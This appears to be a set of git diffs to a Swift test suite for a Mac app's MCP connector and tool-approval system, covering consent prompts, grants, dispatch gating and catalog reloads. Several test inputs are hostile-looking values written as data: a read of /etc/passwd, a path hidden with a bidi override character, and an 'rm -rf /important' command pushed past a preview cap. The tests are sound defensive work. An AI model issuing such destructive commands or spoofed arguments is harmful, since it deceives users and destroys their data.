+        #expect(reloaded.mode == .autoApproveAll)
+    }
+
+    @Test("A cancelled turn reports unavailable, not a user decline")
+    func cancellationIsNotADecline() async {
+        // The distinction is user-visible: a decline is an outcome the user
+        // chose; a cancellation is not something to attribute to them.
+        let store = makeApproval()
+        let task = Task {
+            await store.requestApproval(
+                toolName: "fs__read_file", serverName: "fs", argumentsJSON: "{}"
+            )
+        }
+        try? await Task.sleep(nanoseconds: 20_000_000)
+        task.cancel()
+        let outcome = await task.value
+        #expect(outcome == .unavailable)
+        #expect(store.pendingRequest == nil, "the sheet is torn down with the turn")
+    }
+
+    @Test("A second concurrent prompt is refused rather than left hanging")
+    func reentrancyIsRefused() async {
+        let store = makeApproval()
+        async let first = store.requestApproval(
+            toolName: "fs__a", serverName: "fs", argumentsJSON: "{}"
+        )
+        try? await Task.sleep(nanoseconds: 20_000_000)
+        let second = await store.requestApproval(
+            toolName: "fs__b", serverName: "fs", argumentsJSON: "{}"
+        )
+        #expect(second == .unavailable)
+        store.answer(.deny)
+        let firstOutcome = await first
+        #expect(firstOutcome == .deny)
+    }
+
+    @Test("Auto-approve mode skips the prompt entirely")
+    func autoApproveSkipsPrompt() async {
+        let store = makeApproval()
+        store.mode = .autoApproveAll
+        let decision = await store.requestApproval(
+            toolName: "anything__at_all", serverName: "x", argumentsJSON: "{}"
+        )
+        #expect(decision == .allowOnce)
+        #expect(store.pendingRequest == nil)
+    }
+
+    @Test("The tool half of a namespaced name is split on the first separator")
+    func shortToolName() {
+        #expect(MCPToolApprovalStore.shortToolName("fs__read_file") == "read_file")
+        // The server half never contains `__`, so a tool whose own name does
+        // keeps it.
+        #expect(MCPToolApprovalStore.shortToolName("fs__odd__name") == "odd__name")
+        #expect(MCPToolApprovalStore.shortToolName("no_separator") == "no_separator")
+    }
+
+    // MARK: - Registry dispatch
+
+    private func makeCatalog() -> MCPCatalog {
+        // No endpoint: every network path short-circuits, which is what we
+        // want for the gate tests — a call that reaches the transport has
+        // already passed the gates under test.
+        MCPCatalog(endpoint: { nil })
+    }
+
+    @Test("A disabled connector tool is refused at dispatch, not merely unadvertised")
+    func disabledToolIsRefusedAtDispatch() async {
+        // Omitting a tool from the request body does NOT stop a malformed
+        // model emitting a call for it. The dispatch-side refusal is the
+        // load-bearing gate.
+        let registry = MCPToolRegistry(
+            catalog: makeCatalog(),
+            approval: makeApproval(),
+            defaults: freshDefaults()
+        )
+        registry.setToolEnabled("fs__read_file", false)
+        #expect(!registry.isToolEnabled("fs__read_file"))
+
+        let result = await registry.run(
+            ToolCall(id: "c1", name: "fs__read_file", arguments: "{}")
+        )
+        #expect(result.isError)
+        #expect(result.failureKind == .userDeclined)
+        #expect(result.content.contains("turned off"))
+    }
+
+    @Test("A tool switched off stays off across a relaunch")
+    func disabledToolPersists() {
+        let defaults = freshDefaults()
+        let catalog = makeCatalog()
+        let approval = makeApproval()
+        MCPToolRegistry(catalog: catalog, approval: approval, defaults: defaults)
+            .setToolEnabled("fs__read_file", false)
+        let reloaded = MCPToolRegistry(catalog: catalog, approval: approval, defaults: defaults)
+        #expect(reloaded.disabledTools.contains("fs__read_file"))
+    }
+
+    @Test("A denied tool call does not execute")
+    func deniedToolDoesNotRun() async {
+        let approval = makeApproval()
+        let registry = MCPToolRegistry(
+            catalog: makeCatalog(),
+            approval: approval,
+            defaults: freshDefaults()
+        )
+        async let result = registry.run(
+            ToolCall(id: "c1", name: "fs__read_file", arguments: #"{"path":"/etc/passwd"}"#)
+        )
+        try? await Task.sleep(nanoseconds: 20_000_000)
+        #expect(approval.pendingRequest != nil, "the user is asked before anything runs")
+        approval.answer(.deny)
+
+        let r = await result
+        #expect(r.isError)
+        #expect(r.failureKind == .userDeclined)
+        #expect(r.content.contains("declined"))
+    }
+
+    @Test("The approval prompt names the server and shows the arguments display-safe")
+    func promptCarriesContext() async {
+        let approval = makeApproval()
+        // A model can hide the real target behind bidi / zero-width scalars.
+        // The user has to see what the engine will actually receive.
+        async let decision = approval.requestApproval(
+            toolName: "fs__read_file",
+            serverName: "fs",
+            argumentsJSON: "{\"path\":\"/etc/\u{202E}gnp.txt\"}"
+        )
+        try? await Task.sleep(nanoseconds: 20_000_000)
+        let pending = approval.pendingRequest
+        #expect(pending?.serverName == "fs")
+        #expect(pending?.shortName == "read_file")
+        #expect(pending?.argumentsPreview.contains("\\u{202E}") == true)
+        #expect(pending?.argumentsPreview.contains("\u{202E}") == false)
+        approval.answer(.deny)
+        _ = await decision
+    }
+
+    // MARK: - Composite registry
+
+    private func makeComposite() -> CompositeToolRegistry {
+        CompositeToolRegistry(
+            builtin: BuiltinToolRegistry(
+                browseApproval: BrowseApprovalStore(defaults: freshDefaults()),
+                webSearch: WebSearchConfig(defaults: freshDefaults(), keychain: NullKeychain())
+            ),
+            mcp: MCPToolRegistry(
+                catalog: makeCatalog(),
+                approval: makeApproval(),
+                defaults: freshDefaults()
+            )
+        )
+    }
+
+    @Test("With no connectors up the composite is exactly the built-in surface")
+    func compositeIsBuiltinWhenNoConnectors() {
+        // A user who never turns connectors on must see no change at all.
+        let names = makeComposite().definitions.map { $0.function.name }
+        #expect(names == ["web_search", "browse", "weather"])
+    }
+
+    @Test("A built-in tool still dispatches to the built-in registry")
+    func compositeRoutesBuiltins() async {
+        let result = await makeComposite().run(
+            ToolCall(id: "c1", name: "weather", arguments: "{}")
+        )
+        // Reached the real tool (which then complains about its arguments)
+        // rather than falling through to the unknown-tool branch.
+        #expect(!result.content.contains("unknown tool"))
+    }
+
+    @Test("An unknown name is refused with the names that ARE available")
+    func compositeRefusesUnknown() async {
+        let result = await makeComposite().run(
+            ToolCall(id: "c1", name: "definitely__not_a_tool", arguments: "{}")
+        )
+        #expect(result.isError)
+        #expect(result.content.contains("unknown tool"))
+        #expect(result.content.contains("web_search"))
+    }
+
+    // MARK: - Catalog / hot reload
+
+    private func stubbedCatalog() -> MCPCatalog {
+        let cfg = URLSessionConfiguration.ephemeral
+        cfg.protocolClasses = [MCPStubProtocol.self]
+        return MCPCatalog(
+            session: URLSession(configuration: cfg),
+            endpoint: { (host: "127.0.0.1", port: 8000, bearer: "secret") }
+        )
+    }
+
+    @Test("Refresh publishes the engine's server rows, tools, and tool→server map")
+    func refreshPublishesEngineState() async {
+        MCPStubProtocol.reset()
+        MCPStubProtocol.responses["/v1/mcp/servers"] = """
+        {"servers":[{"name":"fs","state":"connected","transport":"stdio","tools_count":1,"error":null}],
+         "error":null,"configured":true}
+        """
+        MCPStubProtocol.responses["/v1/mcp/tools"] = """
+        {"tools":[{"name":"fs__read_file","description":"Read a file","server":"fs",
+                   "parameters":{"type":"object"}}],"count":1}
+        """
+        let catalog = stubbedCatalog()
+        await catalog.refresh()
+
+        #expect(catalog.servers.map(\.name) == ["fs"])
+        #expect(catalog.servers.first?.isConnected == true)
+        #expect(catalog.tools.map { $0.function.name } == ["fs__read_file"])
+        // The approval prompt can't ask a useful question without this map —
+        // "run read_file?" is unanswerable without knowing whose.
+        #expect(catalog.serverForTool["fs__read_file"] == "fs")
+        #expect(catalog.isConfigured)
+    }
+
+    @Test("A reload the engine answers but has no config for reports failure")
+    func reloadWithoutEngineConfigIsNotSuccess() async {
+        // The trap this pins: the child was spawned BEFORE connectors were
+        // switched on, so it never received --mcp-config. The reload route
+        // still answers 200 with an error string. Treating "the request
+        // succeeded" as "the change applied" would clear the restart banner
+        // while the user's edit sat inert — the exact silently-ignored-edit
+        // failure issue #1716 calls out.
+        MCPStubProtocol.reset()
+        MCPStubProtocol.responses["/v1/mcp/reload"] = """
+        {"servers":[],"error":"No MCP config path known — start the server with --mcp-config",
+         "configured":false}
+        """
+        let catalog = stubbedCatalog()
+        let applied = await catalog.reload()
+        #expect(!applied)
+        #expect(catalog.subsystemError != nil)
+        // The panel's restart banner is DERIVED from this flag rather than
+        // stored in view state — an earlier version kept it in `@State`, which
+        // meant switching Settings tabs silently reset it and left the user
+        // with only the engine's "start the server with --mcp-config"
+        // complaint. It has to stay false here for the banner to survive.
+        #expect(!catalog.isConfigured)
+    }
+
+    @Test("A successful reload against a configured engine clears the restart condition")
+    func reloadAgainstConfiguredEngineSucceeds() async {
+        MCPStubProtocol.reset()
+        MCPStubProtocol.responses["/v1/mcp/reload"] = """
+        {"servers":[{"name":"time","state":"connected","transport":"stdio","tools_count":1,"error":null}],
+         "error":null,"configured":true}
+        """
+        MCPStubProtocol.responses["/v1/mcp/servers"] = """
+        {"servers":[{"name":"time","state":"connected","transport":"stdio","tools_count":1,"error":null}],
+         "error":null,"configured":true}
+        """
+        MCPStubProtocol.responses["/v1/mcp/tools"] = """
+        {"tools":[{"name":"time__get_current_time","description":"d","server":"time","parameters":{}}],"count":1}
+        """
+        let catalog = stubbedCatalog()
+        let applied = await catalog.reload()
+        #expect(applied)
+        #expect(catalog.isConfigured)
+        // A reload has to leave the tool list current too — the response only
+        // carries server rows, so it must follow up with the tools route or a
+        // newly-added connector's tools would never reach the model.
+        #expect(catalog.tools.map { $0.function.name } == ["time__get_current_time"])
+    }
+
+    @Test("A reload against an engine with no reload route reports failure")
+    func reloadAgainstOlderEngineIsNotSuccess() async {
+        MCPStubProtocol.reset()
+        MCPStubProtocol.statusCodes["/v1/mcp/reload"] = 404
+        let catalog = stubbedCatalog()
+        let applied = await catalog.reload()
+        #expect(!applied, "an older engine build must fall back to the restart banner")
+    }
+
+    @Test("A transient fetch failure keeps the last-known-good list")
+    func refreshFailureDoesNotWipeState() async {
+        MCPStubProtocol.reset()
+        MCPStubProtocol.responses["/v1/mcp/servers"] = """
+        {"servers":[{"name":"fs","state":"connected","transport":"stdio","tools_count":0,"error":null}],
+         "error":null,"configured":true}
+        """
+        MCPStubProtocol.responses["/v1/mcp/tools"] = #"{"tools":[],"count":0}"#
+        let catalog = stubbedCatalog()
+        await catalog.refresh()
+        #expect(catalog.servers.count == 1)
+
+        // A dropped poll must not make every connector row flicker away.
+        MCPStubProtocol.statusCodes["/v1/mcp/servers"] = 503
+        await catalog.refresh()
+        #expect(catalog.servers.count == 1)
+        #expect(catalog.fetchError != nil, "…but it must say we couldn't check")
+    }
+
+    @Test("Clearing the catalog drops every tool")
+    func clearDropsTools() async {
+        MCPStubProtocol.reset()
+        MCPStubProtocol.responses["/v1/mcp/servers"] = #"{"servers":[],"error":null,"configured":true}"#
+        MCPStubProtocol.responses["/v1/mcp/tools"] = """
+        {"tools":[{"name":"fs__read_file","description":"d","server":"fs","parameters":{}}],"count":1}
+        """
+        let catalog = stubbedCatalog()
+        await catalog.refresh()
+        #expect(!catalog.tools.isEmpty)
+
+        // Called when the child goes away, and when the user switches
+        // connectors off. Keeping the list would let the chat loop advertise
+        // tools with no process behind them.
+        catalog.clear()
+        #expect(catalog.tools.isEmpty)
+        #expect(catalog.serverForTool.isEmpty)
+
+        let registry = MCPToolRegistry(
+            catalog: catalog, approval: makeApproval(), defaults: freshDefaults()
+        )
+        #expect(registry.definitions.isEmpty)
+    }
+}
+
+/// Stubs the loopback MCP routes so the catalog can be driven without an
+/// engine. Keyed by path so one instance serves the two-GET refresh.
+final class MCPStubProtocol: URLProtocol, @unchecked Sendable {
+    nonisolated(unsafe) static var responses: [String: String] = [:]
+    nonisolated(unsafe) static var statusCodes: [String: Int] = [:]
+
+    static func reset() {
+        responses = [:]
+        statusCodes = [:]
+    }
+
+    override class func canInit(with request: URLRequest) -> Bool { true }
+    override class func canonicalRequest(for request: URLRequest) -> URLRequest { request }
+
+    override func startLoading() {
+        let path = request.url?.path ?? ""
+        let status = Self.statusCodes[path] ?? 200
+        let body = Self.responses[path] ?? "{}"
+        let response = HTTPURLResponse(
+            url: request.url!,
+            statusCode: status,
+            httpVersion: "HTTP/1.1",
+            headerFields: ["Content-Type": "application/json"]
+        )!
+        client?.urlProtocol(self, didReceive: response, cacheStoragePolicy: .notAllowed)
+        client?.urlProtocol(self, didLoad: Data(body.utf8))
+        client?.urlProtocolDidFinishLoading(self)
+    }
+
+    override func stopLoading() {}
+}
+
+/// Keychain double so constructing a ``WebSearchConfig`` in these tests never
+/// touches the real login keychain (which would prompt, and would leak between
+/// runs). ``BuiltinToolsTests`` has its own file-private equivalent; these
+/// tests never exercise a key path, so this one just answers "nothing stored".
+private struct NullKeychain: KeychainStoring, Sendable {
+    func read(account: String) -> String? { nil }
+    @discardableResult func write(account: String, secret: String) -> Bool { true }
+    @discardableResult func delete(account: String) -> Bool { true }
+}

--- a/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
@@ -252,6 +252,17 @@ final class MCPConnectorsTests {
         MCPToolApprovalStore(defaults: freshDefaults())
     }
 
+    /// Wait until the approval sheet is up, deterministically. A fixed sleep
+    /// flakes on a loaded worker that hasn't scheduled the requesting task yet;
+    /// this returns the instant `pendingRequest` populates, and gives up after
+    /// a generous bound so a genuine hang fails loudly instead of spinning.
+    private func waitForPending(_ store: MCPToolApprovalStore) async {
+        for _ in 0..<400 {
+            if store.pendingRequest != nil { return }
+            try? await Task.sleep(nanoseconds: 5_000_000)  // 5ms; ~2s ceiling
+        }
+    }
+
     @Test("Always-allow is remembered for that tool and no other")
     func grantIsPerTool() async {
         let store = makeApproval()
@@ -262,7 +273,7 @@ final class MCPConnectorsTests {
             serverName: "fs",
             argumentsJSON: #"{"path":"/etc/hosts"}"#
         )
-        try? await Task.sleep(nanoseconds: 20_000_000)
+        await waitForPending(store)
         store.answer(.alwaysAllowTool)
         let answered = await decision
         #expect(answered == .alwaysAllowTool)
@@ -286,7 +297,7 @@ final class MCPConnectorsTests {
         async let decision = store.requestApproval(
             toolName: "fs__read_file", serverName: "fs", argumentsJSON: "{}"
         )
-        try? await Task.sleep(nanoseconds: 20_000_000)
+        await waitForPending(store)
         store.answer(.allowOnce)
         _ = await decision
         #expect(!store.isGranted("fs__read_file"))
@@ -319,7 +330,7 @@ final class MCPConnectorsTests {
                 toolName: "fs__read_file", serverName: "fs", argumentsJSON: "{}"
             )
         }
-        try? await Task.sleep(nanoseconds: 20_000_000)
+        await waitForPending(store)
         task.cancel()
         let outcome = await task.value
         #expect(outcome == .unavailable)
@@ -332,7 +343,7 @@ final class MCPConnectorsTests {
         async let first = store.requestApproval(
             toolName: "fs__a", serverName: "fs", argumentsJSON: "{}"
         )
-        try? await Task.sleep(nanoseconds: 20_000_000)
+        await waitForPending(store)
         let second = await store.requestApproval(
             toolName: "fs__b", serverName: "fs", argumentsJSON: "{}"
         )
@@ -340,6 +351,53 @@ final class MCPConnectorsTests {
         store.answer(.deny)
         let firstOutcome = await first
         #expect(firstOutcome == .deny)
+    }
+
+    @Test("Repointing a connector at different code revokes its remembered grants")
+    func reconfiguringAConnectorRevokesGrants() throws {
+        let defaults = freshDefaults()
+        // A remembered "always allow" for a tool on the "fs" connector.
+        defaults.set(true, forKey: MCPToolApprovalStore.grantKey("fs__read_file"))
+        let approval = MCPToolApprovalStore(defaults: defaults)
+        #expect(approval.isGranted("fs__read_file"))
+
+        let url = tempConfigURL()
+        try FileManager.default.createDirectory(
+            at: url.deletingLastPathComponent(), withIntermediateDirectories: true
+        )
+        let store = MCPConfigStore(defaults: defaults, fileURL: url)
+        store.onServerReconfigured = { approval.revokeGrants(forServer: $0) }
+
+        try store.upsert(MCPServerConfig(name: "fs", command: "npx"))
+        #expect(approval.isGranted("fs__read_file"), "adding a connector is not a reconfiguration")
+
+        // Point the SAME name at a different command. The grant would otherwise
+        // silently authorize the new program — it must be dropped instead.
+        try store.upsert(MCPServerConfig(name: "fs", command: "evil"), replacing: "fs")
+        #expect(!approval.isGranted("fs__read_file"))
+    }
+
+    @Test("A non-code edit keeps the grant, but removing the connector drops it")
+    func benignEditKeepsGrantRemovalDropsIt() throws {
+        let defaults = freshDefaults()
+        defaults.set(true, forKey: MCPToolApprovalStore.grantKey("fs__read_file"))
+        let approval = MCPToolApprovalStore(defaults: defaults)
+
+        let url = tempConfigURL()
+        try FileManager.default.createDirectory(
+            at: url.deletingLastPathComponent(), withIntermediateDirectories: true
+        )
+        let store = MCPConfigStore(defaults: defaults, fileURL: url)
+        store.onServerReconfigured = { approval.revokeGrants(forServer: $0) }
+        try store.upsert(MCPServerConfig(name: "fs", command: "npx"))
+
+        // Bumping the timeout doesn't change what code runs — the grant stays.
+        try store.upsert(MCPServerConfig(name: "fs", command: "npx", timeout: 60), replacing: "fs")
+        #expect(approval.isGranted("fs__read_file"))
+
+        // Removing the connector drops the grant so re-adding starts unapproved.
+        try store.remove(named: "fs")
+        #expect(!approval.isGranted("fs__read_file"))
     }
 
     @Test("Auto-approve mode skips the prompt entirely")
@@ -414,7 +472,7 @@ final class MCPConnectorsTests {
         async let result = registry.run(
             ToolCall(id: "c1", name: "fs__read_file", arguments: #"{"path":"/etc/passwd"}"#)
         )
-        try? await Task.sleep(nanoseconds: 20_000_000)
+        await waitForPending(approval)
         #expect(approval.pendingRequest != nil, "the user is asked before anything runs")
         approval.answer(.deny)
 
@@ -434,12 +492,30 @@ final class MCPConnectorsTests {
             serverName: "fs",
             argumentsJSON: "{\"path\":\"/etc/\u{202E}gnp.txt\"}"
         )
-        try? await Task.sleep(nanoseconds: 20_000_000)
+        await waitForPending(approval)
         let pending = approval.pendingRequest
         #expect(pending?.serverName == "fs")
         #expect(pending?.shortName == "read_file")
         #expect(pending?.argumentsPreview.contains("\\u{202E}") == true)
         #expect(pending?.argumentsPreview.contains("\u{202E}") == false)
+        approval.answer(.deny)
+        _ = await decision
+    }
+
+    @Test("The prompt shows the whole argument payload, not a capped preview")
+    func promptShowsFullArguments() async {
+        let approval = makeApproval()
+        // The consent gate executes the complete JSON, so it has to SHOW the
+        // complete JSON. A model can push the dangerous part past any cap; the
+        // sheet scrolls, so there is no reason to hide it.
+        let tail = "rm -rf /important"
+        let bigArgs = "{\"cmd\":\"" + String(repeating: "a", count: 600) + tail + "\"}"
+        async let decision = approval.requestApproval(
+            toolName: "sh__run", serverName: "sh", argumentsJSON: bigArgs
+        )
+        await waitForPending(approval)
+        let preview = approval.pendingRequest?.argumentsPreview ?? ""
+        #expect(preview.contains(tail), "content past the old 400-char cap must be visible")
         approval.answer(.deny)
         _ = await decision
     }

--- a/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
@@ -605,6 +605,50 @@ final class MCPConnectorsTests {
         #expect(result.content.contains("web_search"))
     }
 
+    @Test("Golden path: a live connector tool joins the built-in surface, dispatches, and the master switch collapses it")
+    func compositeConnectorGoldenPath() async {
+        // The end-to-end surface the chat loop actually reads: built-ins plus a
+        // connected MCP tool, one registry, gated by the master switch. Covers
+        // in one flow what the unit tests check in pieces — advertise, route,
+        // and the connectors-off collapse.
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] = """
+        {"servers":[{"name":"time","state":"connected","transport":"stdio","tools_count":1,"error":null}],
+         "error":null,"configured":true}
+        """
+        MCPStubProtocol.responses[key(port, "/v1/mcp/tools")] = """
+        {"tools":[{"name":"time__now","description":"d","server":"time","parameters":{}}],"count":1}
+        """
+        await catalog.refresh()
+
+        let defaults = enabledDefaults()
+        let composite = CompositeToolRegistry(
+            builtin: BuiltinToolRegistry(
+                browseApproval: BrowseApprovalStore(defaults: freshDefaults()),
+                webSearch: WebSearchConfig(defaults: freshDefaults(), keychain: NullKeychain())
+            ),
+            mcp: MCPToolRegistry(catalog: catalog, approval: makeApproval(), defaults: defaults)
+        )
+
+        // Connectors on: the connector tool sits alongside the built-in three.
+        #expect(composite.definitions.map { $0.function.name }
+            == ["web_search", "browse", "weather", "time__now"])
+        // And a call for it routes to the MCP side (reaching the approval gate),
+        // not the unknown-tool branch.
+        async let dispatched = composite.run(
+            ToolCall(id: "c1", name: "time__now", arguments: "{}")
+        )
+        await waitForPending(composite.mcp.approval)
+        composite.mcp.approval.answer(.deny)
+        let routed = await dispatched
+        #expect(!routed.content.contains("unknown tool"))
+
+        // Master switch off collapses the surface back to the built-ins.
+        defaults.set(false, forKey: MCPConfigStore.enabledKey)
+        #expect(composite.definitions.map { $0.function.name }
+            == ["web_search", "browse", "weather"])
+    }
+
     // MARK: - Catalog / hot reload
 
     /// Hands out a port nobody else in this run is using.
@@ -701,6 +745,23 @@ final class MCPConnectorsTests {
         // carries server rows, so it must follow up with the tools route or a
         // newly-added connector's tools would never reach the model.
         #expect(catalog.tools.map { $0.function.name } == ["time__get_current_time"])
+    }
+
+    @Test("A tool whose namespaced name exceeds the 64-char function limit is dropped")
+    func overlongToolNameIsNotAdvertised() async {
+        let (catalog, port) = stubbedCatalog()
+        let longName = "srv__" + String(repeating: "x", count: 70)  // 75 > 64
+        MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] =
+            #"{"servers":[],"error":null,"configured":true}"#
+        MCPStubProtocol.responses[key(port, "/v1/mcp/tools")] = """
+        {"tools":[{"name":"srv__ok","description":"d","server":"srv","parameters":{}},
+                  {"name":"\(longName)","description":"d","server":"srv","parameters":{}}],"count":2}
+        """
+        await catalog.refresh()
+        // The over-long one can't be a legal OpenAI function name, so it is not
+        // offered rather than advertised as a tool the model can never call.
+        #expect(catalog.tools.map { $0.function.name } == ["srv__ok"])
+        #expect(catalog.serverForTool[longName] == nil)
     }
 
     @Test("A reload whose tool re-fetch fails reports failure, not success")

--- a/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
@@ -461,27 +461,44 @@ final class MCPConnectorsTests {
 
     // MARK: - Catalog / hot reload
 
-    private func stubbedCatalog() -> MCPCatalog {
+    /// Hands out a port nobody else in this run is using.
+    ///
+    /// swift-testing runs tests in PARALLEL. The stub's response table is
+    /// necessarily static (URLProtocol instances are created by URLSession,
+    /// so there is nowhere else to put it), and an earlier version had every
+    /// test write to the same keys and call a global `reset()`. Tests then
+    /// wiped each other's fixtures mid-run: one reload test failed outright,
+    /// and — worse — the other passed for the wrong reason, because it
+    /// asserted `!applied` and a stubbed-out request fails too. Keying every
+    /// fixture by port keeps the tests independent without serialising them.
+    private static var nextStubPort = 9000
+
+    /// Fixture key: port scopes it to one test, path selects the route.
+    private func key(_ port: Int, _ path: String) -> String { "\(port)\(path)" }
+
+    private func stubbedCatalog() -> (catalog: MCPCatalog, port: Int) {
+        let port = Self.nextStubPort
+        Self.nextStubPort += 1
         let cfg = URLSessionConfiguration.ephemeral
         cfg.protocolClasses = [MCPStubProtocol.self]
-        return MCPCatalog(
+        let catalog = MCPCatalog(
             session: URLSession(configuration: cfg),
-            endpoint: { (host: "127.0.0.1", port: 8000, bearer: "secret") }
+            endpoint: { (host: "127.0.0.1", port: port, bearer: "secret") }
         )
+        return (catalog, port)
     }
 
     @Test("Refresh publishes the engine's server rows, tools, and tool→server map")
     func refreshPublishesEngineState() async {
-        MCPStubProtocol.reset()
-        MCPStubProtocol.responses["/v1/mcp/servers"] = """
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] = """
         {"servers":[{"name":"fs","state":"connected","transport":"stdio","tools_count":1,"error":null}],
          "error":null,"configured":true}
         """
-        MCPStubProtocol.responses["/v1/mcp/tools"] = """
+        MCPStubProtocol.responses[key(port, "/v1/mcp/tools")] = """
         {"tools":[{"name":"fs__read_file","description":"Read a file","server":"fs",
                    "parameters":{"type":"object"}}],"count":1}
         """
-        let catalog = stubbedCatalog()
         await catalog.refresh()
 
         #expect(catalog.servers.map(\.name) == ["fs"])
@@ -501,12 +518,11 @@ final class MCPConnectorsTests {
         // succeeded" as "the change applied" would clear the restart banner
         // while the user's edit sat inert — the exact silently-ignored-edit
         // failure issue #1716 calls out.
-        MCPStubProtocol.reset()
-        MCPStubProtocol.responses["/v1/mcp/reload"] = """
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/reload")] = """
         {"servers":[],"error":"No MCP config path known — start the server with --mcp-config",
          "configured":false}
         """
-        let catalog = stubbedCatalog()
         let applied = await catalog.reload()
         #expect(!applied)
         #expect(catalog.subsystemError != nil)
@@ -520,19 +536,18 @@ final class MCPConnectorsTests {
 
     @Test("A successful reload against a configured engine clears the restart condition")
     func reloadAgainstConfiguredEngineSucceeds() async {
-        MCPStubProtocol.reset()
-        MCPStubProtocol.responses["/v1/mcp/reload"] = """
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/reload")] = """
         {"servers":[{"name":"time","state":"connected","transport":"stdio","tools_count":1,"error":null}],
          "error":null,"configured":true}
         """
-        MCPStubProtocol.responses["/v1/mcp/servers"] = """
+        MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] = """
         {"servers":[{"name":"time","state":"connected","transport":"stdio","tools_count":1,"error":null}],
          "error":null,"configured":true}
         """
-        MCPStubProtocol.responses["/v1/mcp/tools"] = """
+        MCPStubProtocol.responses[key(port, "/v1/mcp/tools")] = """
         {"tools":[{"name":"time__get_current_time","description":"d","server":"time","parameters":{}}],"count":1}
         """
-        let catalog = stubbedCatalog()
         let applied = await catalog.reload()
         #expect(applied)
         #expect(catalog.isConfigured)
@@ -544,27 +559,29 @@ final class MCPConnectorsTests {
 
     @Test("A reload against an engine with no reload route reports failure")
     func reloadAgainstOlderEngineIsNotSuccess() async {
-        MCPStubProtocol.reset()
-        MCPStubProtocol.statusCodes["/v1/mcp/reload"] = 404
-        let catalog = stubbedCatalog()
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.statusCodes[key(port, "/v1/mcp/reload")] = 404
         let applied = await catalog.reload()
         #expect(!applied, "an older engine build must fall back to the restart banner")
+        // Pin WHY it failed. `!applied` alone also holds when the request
+        // never reached the stub at all, which is how the parallel-fixture bug
+        // let this test pass while its sibling failed.
+        #expect(catalog.fetchError?.contains("404") == true)
     }
 
     @Test("A transient fetch failure keeps the last-known-good list")
     func refreshFailureDoesNotWipeState() async {
-        MCPStubProtocol.reset()
-        MCPStubProtocol.responses["/v1/mcp/servers"] = """
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] = """
         {"servers":[{"name":"fs","state":"connected","transport":"stdio","tools_count":0,"error":null}],
          "error":null,"configured":true}
         """
-        MCPStubProtocol.responses["/v1/mcp/tools"] = #"{"tools":[],"count":0}"#
-        let catalog = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/tools")] = #"{"tools":[],"count":0}"#
         await catalog.refresh()
         #expect(catalog.servers.count == 1)
 
         // A dropped poll must not make every connector row flicker away.
-        MCPStubProtocol.statusCodes["/v1/mcp/servers"] = 503
+        MCPStubProtocol.statusCodes[key(port, "/v1/mcp/servers")] = 503
         await catalog.refresh()
         #expect(catalog.servers.count == 1)
         #expect(catalog.fetchError != nil, "…but it must say we couldn't check")
@@ -572,12 +589,11 @@ final class MCPConnectorsTests {
 
     @Test("Clearing the catalog drops every tool")
     func clearDropsTools() async {
-        MCPStubProtocol.reset()
-        MCPStubProtocol.responses["/v1/mcp/servers"] = #"{"servers":[],"error":null,"configured":true}"#
-        MCPStubProtocol.responses["/v1/mcp/tools"] = """
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] = #"{"servers":[],"error":null,"configured":true}"#
+        MCPStubProtocol.responses[key(port, "/v1/mcp/tools")] = """
         {"tools":[{"name":"fs__read_file","description":"d","server":"fs","parameters":{}}],"count":1}
         """
-        let catalog = stubbedCatalog()
         await catalog.refresh()
         #expect(!catalog.tools.isEmpty)
 
@@ -596,23 +612,25 @@ final class MCPConnectorsTests {
 }
 
 /// Stubs the loopback MCP routes so the catalog can be driven without an
-/// engine. Keyed by path so one instance serves the two-GET refresh.
+/// engine.
+///
+/// Fixtures are keyed `"<port><path>"`, not by path alone. URLSession
+/// instantiates the protocol itself, so the table has to be static — and
+/// swift-testing runs tests in parallel, so a path-only key had concurrent
+/// tests overwriting and clearing each other's fixtures. There is
+/// deliberately no `reset()`: a global wipe is precisely what broke them.
 final class MCPStubProtocol: URLProtocol, @unchecked Sendable {
     nonisolated(unsafe) static var responses: [String: String] = [:]
     nonisolated(unsafe) static var statusCodes: [String: Int] = [:]
-
-    static func reset() {
-        responses = [:]
-        statusCodes = [:]
-    }
 
     override class func canInit(with request: URLRequest) -> Bool { true }
     override class func canonicalRequest(for request: URLRequest) -> URLRequest { request }
 
     override func startLoading() {
-        let path = request.url?.path ?? ""
-        let status = Self.statusCodes[path] ?? 200
-        let body = Self.responses[path] ?? "{}"
+        let url = request.url
+        let key = "\(url?.port ?? 0)\(url?.path ?? "")"
+        let status = Self.statusCodes[key] ?? 200
+        let body = Self.responses[key] ?? "{}"
         let response = HTTPURLResponse(
             url: request.url!,
             statusCode: status,

--- a/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
@@ -63,6 +63,10 @@ final class MCPConnectorsTests {
         #expect(!MCPServerConfig.isValidName("dots.are.out"))
         #expect(!MCPServerConfig.isValidName(""))
         #expect(!MCPServerConfig.isValidName(String(repeating: "a", count: 33)))
+        // `__` is the namespace separator; a name containing it splits wrong
+        // and the server's tools never dispatch. A single `_` is fine.
+        #expect(!MCPServerConfig.isValidName("my__server"))
+        #expect(MCPServerConfig.isValidName("my_server"))
     }
 
     @Test("A stdio entry needs a command and an SSE entry needs a valid URL")

--- a/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
